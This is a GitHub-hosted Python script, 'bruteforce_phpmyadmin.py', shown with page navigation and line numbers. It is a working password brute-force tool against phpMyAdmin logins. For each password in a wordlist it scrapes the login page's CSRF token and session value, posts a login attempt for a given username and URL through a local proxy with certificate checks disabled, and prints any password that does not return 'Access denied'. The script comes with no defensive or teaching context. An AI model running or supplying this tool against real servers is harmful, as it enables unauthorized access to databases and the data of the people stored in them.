-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathbruteforce_phpmyadmin.py
54 lines (41 loc) · 1.54 KB
/
bruteforce_phpmyadmin.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
import requests
import json
import sys
from urllib.parse import unquote
import base64
requests.packages.urllib3.disable_warnings()
f=open(sys.argv[1], "r")
for passw in f:
res = requests.get(sys.argv[3])
header = res.headers
cookie_header = header.get('Set-Cookie')
phpmyadmin_cookie = None
if cookie_header:
cookies = cookie_header.split('; ')
for cookie in cookies:
if 'phpMyAdmin' in cookie:
phpmyadmin_cookie = cookie.split('=')[1]
token = res.text.split('name="token" value="')[1].split('"')[0]
set_session = res.text.split('name="set_session" value="')[1].split('"')[0]
proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}
data = {
'set_session': set_session,
'pma_username' : sys.argv[2],
'pma_password' : passw,
'server' : '1',
'target' : 'index.php',
'token' : token
}
res = requests.post(sys.argv[3], proxies=proxies, verify=False, cookies={
'phpMyAdmin_https': set_session
}, headers={
'Sec-Fetch-Dest': 'document',
'Sec-Fetch-Mode': 'navigate',
'Sec-Fetch-Site': 'same-origin',
'Sec-Fetch-User': '?1',
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0',
'Origin' : 'null'
}, data=data)
if(res.text.find('Access denied') == -1):
print("OLALA CEST CA LE MOT DE PASSE : "+passw)
print(res.text)